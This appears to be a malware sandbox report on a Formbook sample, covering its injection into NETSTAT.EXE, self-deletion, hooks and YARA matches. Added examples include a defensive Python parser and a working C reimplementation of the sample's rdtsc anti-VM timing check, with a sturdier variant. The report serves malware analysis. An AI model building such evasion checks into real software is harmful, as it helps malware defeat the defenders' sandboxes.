Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA9A20 NtResumeThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA97A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CAA3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA9760 NtOpenProcess,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA9770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CAA770 NtOpenThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA9B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CAA710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA9730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA98F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA98A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CAB040 NtSuspendThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA9820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA99D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA95F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA9950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA9560 NtWriteFile,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA9520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CAAD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_0044A060 NtClose,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_0044A110 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_00449F30 NtCreateFile,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_00449FE0 NtReadFile,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_00449F82 NtCreateFile,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_00401030
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_0041E1F6
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_0041EBD7
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_0041E461
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_0041EC27
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_00402D87
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_00402D90
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_00409E40
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_00409E3B
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_0041E7D7
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_0041E7DA
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_00402FB0
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_01771D55
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016A0D20
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016C4120
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016AF900
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016BD5E0
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_01761002
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016B841F
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016BB090
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016DEBB0
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016C6E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02D32EF7
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02D322AE
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02C86E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02D31FF1
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02C9EBB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02D32B28
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02C7B090
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02C920A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02D320A8
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02D21002
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02C7841F
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02C7D5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02C92581
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02D31D55
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02C6F900
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02D32D07
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02C60D20
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02C84120
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_0044E1F6
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_0044E461
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_00432D87
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_00432D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_00439E40
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_00439E3B
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_0044E7DA
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_00432FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: String function: 02C6B150 appears 35 times
Source: C:\Users\user\Desktop\in.exe; Code function: String function: 016AB150 appears 32 times
Source: C:\Users\user\Desktop\in.exe; Code function: String function: 00B47C9A appears 60 times
Source: in.exe, 00000001.00000003.250265287.000000001ACCF000.00000004.00000001.sdmp; Binary or memory string: OriginalFilenamentdll.dllj% vs in.exe
Source: in.exe, 00000002.00000002.292671384.0000000001670000.00000040.00000001.sdmp; Binary or memory string: OriginalFilenamenetstat.exej% vs in.exe
Source: in.exe, 00000002.00000002.292914452.000000000179F000.00000040.00000001.sdmp; Binary or memory string: OriginalFilenamentdll.dllj% vs in.exe
Source: in.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
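The code-function lines above carry more than a list of native calls. The same functions show up in PID 2 (the second in.exe instance) and PID 11 (NETSTAT.EXE) at addresses that differ by a constant, which is what a relocated copy of one body of code looks like, and the Nt* stubs in the 0x016E9xxx / 0x02CA9xxx range sit outside the payload image and reference LdrInitializeThunk, i.e. they are not calls into the loaded ntdll.dll. The Python script below is an added example, not part of this report or of the sandbox that produced it. It parses a subset of the lines above (copied from the report with the field separator restored), checks each process for minimal sets of native calls behind process hollowing, APC injection and cross-process section mapping (the sets are an assumption chosen for illustration, not a sandbox rule), and pairs functions across the two processes to recover the relocation deltas. Pairing uses the resolved API name plus the low 16 bits of the address; the assumption is that injected regions land on 64 KiB allocation-granularity boundaries, so a relocated copy keeps the low 16 bits of every function address.

```python
import re
from collections import Counter, defaultdict

# Constructed input: a subset of the "Code function" lines from the report
# above (PID 2 = in.exe, PID 11 = NETSTAT.EXE), with the separator between
# source and detail restored. Not the sandbox's own export format.
REPORT_LINES = r"""
Source: C:\Users\user\Desktop\in.exe Code function: 2_2_0041A060 NtClose,
Source: C:\Users\user\Desktop\in.exe Code function: 2_2_0041A110 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\in.exe Code function: 2_2_00419F30 NtCreateFile,
Source: C:\Users\user\Desktop\in.exe Code function: 2_2_016E99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\in.exe Code function: 2_2_016E97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\in.exe Code function: 2_2_016E9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\in.exe Code function: 2_2_016E9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\in.exe Code function: 2_2_016E9950 NtQueueApcThread,
Source: C:\Users\user\Desktop\in.exe Code function: 2_2_016EAD30 NtSetContextThread,
Source: C:\Users\user\Desktop\in.exe Code function: 2_2_016E99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\in.exe Code function: 2_2_016E98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\in.exe Code function: 2_2_0041E1F6
Source: C:\Users\user\Desktop\in.exe Code function: 2_2_016C6E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_02CA99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_02CA97A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_02CA9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_02CA9A20 NtResumeThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_02CA9950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_02CAAD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_02CA99D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_02CA98A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_0044A060 NtClose,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_0044A110 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00449F30 NtCreateFile,
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_0044E1F6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_02C86E30
"""

# <pid>_<snapshot>_<address> followed by an optional comma-separated API list.
LINE_RE = re.compile(r"Code function:\s*(\d+)_\d+_([0-9A-Fa-f]{8})\s*([A-Za-z0-9_,]*)")


def parse(text):
    """Return one (pid, address, api_names) tuple per code-function line."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        apis = tuple(a for a in m.group(3).split(",") if a)
        records.append((int(m.group(1)), int(m.group(2), 16), apis))
    return records


# Assumption: minimal native-call sets each technique needs. A process whose
# resolved code contains every member of a set is flagged for that technique.
TECHNIQUE_SETS = {
    "process hollowing": {"NtCreateProcessEx", "NtUnmapViewOfSection",
                          "NtWriteVirtualMemory", "NtSetContextThread",
                          "NtResumeThread"},
    "APC injection": {"NtQueueApcThread", "NtWriteVirtualMemory"},
    "section mapping": {"NtCreateSection", "NtMapViewOfSection"},
}


def techniques_per_pid(records):
    """Map each PID to the sorted list of technique sets it fully covers."""
    seen = defaultdict(set)
    for pid, _, apis in records:
        seen[pid].update(a for a in apis if a.startswith("Nt"))  # drop LdrInitializeThunk
    return {pid: sorted(name for name, need in TECHNIQUE_SETS.items() if need <= have)
            for pid, have in seen.items()}


def relocation_deltas(records, pid_a, pid_b):
    """Pair functions between two processes and count the address deltas.

    Key = first resolved API name (empty for unnamed functions) + low 16 bits
    of the address. Assumption: injected regions are 64 KiB aligned, so a
    relocated copy keeps the low 16 bits of each function address."""
    def index(pid):
        return {((apis[0] if apis else ""), addr & 0xFFFF): addr
                for p, addr, apis in records if p == pid}
    a, b = index(pid_a), index(pid_b)
    return Counter(b[k] - a[k] for k in a.keys() & b.keys())


if __name__ == "__main__":
    recs = parse(REPORT_LINES)
    for pid, names in sorted(techniques_per_pid(recs).items()):
        print(f"PID {pid}: {', '.join(names) or 'no primitive set complete'}")
    for delta, n in sorted(relocation_deltas(recs, 2, 11).items()):
        print(f"{n} functions shifted by 0x{delta:X} from PID 2 to PID 11")
```

On the lines above the script reports both processes as covering all three sets, and two shifts: 0x30000, which is exactly the distance from the unpacked payload at 0x400000 in PID 2 to the Yara-matched region at 0x430000 in PID 0xB listed above, and 0x15C0000 for the second code region (the one holding the Nt* stubs). Two clean constant deltas, rather than a scatter, is the signature of the same two mapped regions being copied wholesale into NETSTAT.EXE.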
Source: 0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmp, type: MEMORY; matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmp, type: MEMORY; matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmp, type: MEMORY; matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmp, type: MEMORY; matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.251301972.0000000002B50000.00000004.00000001.sdmp, type: MEMORY; matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.251301972.0000000002B50000.00000004.00000001.sdmp, type: MEMORY; matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.292256394.0000000000400000.00000040.00000001.sdmp, type: MEMORY; matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.292256394.0000000000400000.00000040.00000001.sdmp, type: MEMORY; matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.598393360.0000000000430000.00000040.00000001.sdmp, type: MEMORY; matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.598393360.0000000000430000.00000040.00000001.sdmp, type: MEMORY; matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.598703902.0000000000530000.00000040.00000001.sdmp, type: MEMORY; matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.598703902.0000000000530000.00000040.00000001.sdmp, type: MEMORY; matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.292614037.0000000001600000.00000040.00000001.sdmp, type: MEMORY; matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.292614037.0000000001600000.00000040.00000001.sdmp, type: MEMORY; matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.in.exe.400000.0.unpack, type: UNPACKEDPE; matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.in.exe.400000.0.unpack, type: UNPACKEDPE; matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.in.exe.2b50000.2.raw.unpack, type: UNPACKEDPE; matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.in.exe.2b50000.2.raw.unpack, type: UNPACKEDPE; matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.in.exe.400000.0.raw.unpack, type: UNPACKEDPE; matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.in.exe.400000.0.raw.unpack, type: UNPACKEDPE; matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.in.exe.2b50000.2.unpack, type: UNPACKEDPE; matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.in.exe.2b50000.2.unpack, type: UNPACKEDPE; matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine; Classification label: mal100.troj.evad.winEXE@7/0@6/4
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_01
Source: in.exe; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\in.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe; File read: C:\Windows\System32\drivers\etc\hosts
Source: in.exe; Virustotal: Detection: 46%
Source: C:\Users\user\Desktop\in.exe; File read: C:\Users\user\Desktop\in.exe
Source: unknown; Process created: C:\Users\user\Desktop\in.exe 'C:\Users\user\Desktop\in.exe'
Source: unknown; Process created: C:\Users\user\Desktop\in.exe 'C:\Users\user\Desktop\in.exe'
Source: unknown; Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: unknown; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\in.exe'
Source: unknown; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\in.exe; Process created: C:\Users\user\Desktop\in.exe 'C:\Users\user\Desktop\in.exe'
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\in.exe'
Source: C:\Windows\explorer.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
Source: in.exe; Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: in.exe, 00000002.00000002.292671384.0000000001670000.00000040.00000001.sdmp
          Source: Binary string: netstat.pdb source: in.exe, 00000002.00000002.292671384.0000000001670000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: in.exe, 00000001.00000003.250116639.000000001ABB0000.00000004.00000001.sdmp, in.exe, 00000002.00000002.292914452.000000000179F000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000B.00000002.600753548.0000000002D5F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: in.exe, NETSTAT.EXE
Source: in.exe; Static PE information: real checksum: 0xe27c should be: 0x40e3b
Source: C:\Users\user\Desktop\in.exe; Code function: 1_2_00B47CC0 push eax; ret
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_0041D0D2 push eax; ret
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_0041D0DB push eax; ret
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_0041D085 push eax; ret
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_0041D13C push eax; ret
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_00417BE0 push 28F71FB6h; retf
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_00416561 push ebx; ret
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_004165A6 push ebx; ret
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_00B47CC0 push eax; ret
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016FD0D1 push ecx; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CBD0D1 push ecx; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_0044D0D2 push eax; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_0044D0DB push eax; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_0044D085 push eax; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_0044D13C push eax; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_00447BE0 push 28F71FB6h; retf
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_00446561 push ebx; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_004465A6 push ebx; ret

          Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe; User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xE3
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\in.exe; RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\in.exe; RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE; RDTSC instruction interceptor: First address: 00000000004398E4 second address: 00000000004398EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE; RDTSC instruction interceptor: First address: 0000000000439B5E second address: 0000000000439B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_00409A90 rdtsc
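The interceptor hits above show the same six-byte sequence at two sites in the payload (rdtsc; xor ecx, ecx; add ecx, eax; rdtsc): the low 32 bits of the first timestamp are parked in ecx and the counter is read again, so the difference measures how long the instructions in between took. Under a hypervisor that traps rdtsc, or under single-stepping, that difference balloons. The C program below is an added example, not code from the sample or from the sandbox. It reproduces the measurement, then shows the form of the check a practitioner should expect from more careful samples: the minimum over several pairs, which a single preemption cannot inflate. The threshold of 1000 and the 32-pair sample size are assumptions; the report does not show what value the sample compares against. On non-x86 builds it falls back to a monotonic clock so the logic still runs.

```c
/* Added example: the rdtsc-pair timing check seen at 0x4098E4 / 0x409B5E,
 * in C. Threshold (1000) and sample count (32) are assumptions. */
#define _POSIX_C_SOURCE 200809L
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
/* Real time-stamp counter read, the instruction the sample executes. */
static uint64_t read_counter(void) { return __rdtsc(); }
#else
#include <time.h>
/* Fallback for non-x86 hosts: nanoseconds from a monotonic clock. */
static uint64_t read_counter(void)
{
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
}
#endif

/* Mirror of the sample's sequence: two back-to-back reads, keeping only the
 * low 32 bits of each (the disassembly moves eax into ecx and reads again).
 * Unsigned subtraction handles a 32-bit rollover between the two reads. */
uint32_t rdtsc_pair_delta(void)
{
    uint32_t first = (uint32_t)read_counter();
    uint32_t second = (uint32_t)read_counter();
    return second - first;
}

/* A trapped rdtsc inflates every pair; a context switch inflates only one.
 * Taking the minimum of n pairs keeps the former and discards the latter,
 * which is why a single pair, as the sample uses, is a noisy signal.
 * n == 0 yields 0. */
uint32_t min_pair_delta(size_t n)
{
    uint32_t best = UINT32_MAX;
    if (n == 0)
        return 0;
    for (size_t i = 0; i < n; i++) {
        uint32_t d = rdtsc_pair_delta();
        if (d < best)
            best = d;
    }
    return best;
}

/* The decision: a delta above the threshold means the two reads were not
 * executed back-to-back on bare metal. */
int looks_instrumented(uint32_t delta, uint32_t threshold)
{
    return delta > threshold;
}

int main(void)
{
    uint32_t single = rdtsc_pair_delta();
    uint32_t robust = min_pair_delta(32);
    printf("single pair delta: %u\n", single);
    printf("minimum over 32 pairs: %u\n", robust);
    printf("instrumented (threshold 1000): %s\n",
           looks_instrumented(robust, 1000) ? "yes" : "no");
    return 0;
}
```

Run it twice, once natively and once under a debugger with a breakpoint on the second read, and the single-pair value jumps by several orders of magnitude while the minimum-over-pairs value barely moves between native runs; that stability is what makes the minimum the better discriminator, and also what a sandbox has to defeat (by returning a fixed or rebased counter) rather than merely running fast.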
Source: C:\Windows\explorer.exe TID: 4524; Thread sleep count: 56 > 30
Source: C:\Windows\explorer.exe TID: 4524; Thread sleep time: -112000s >= -30000s
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 5336; Thread sleep count: 33 > 30
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 5336; Thread sleep time: -66000s >= -30000s
Source: C:\Windows\explorer.exe; Last function: Thread delayed
Source: C:\Windows\explorer.exe; Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Last function: Thread delayed
Source: explorer.exe, 00000004.00000000.272838998.0000000008A32000.00000004.00000001.sdmp; Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000004.00000000.272838998.0000000008A32000.00000004.00000001.sdmp; Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
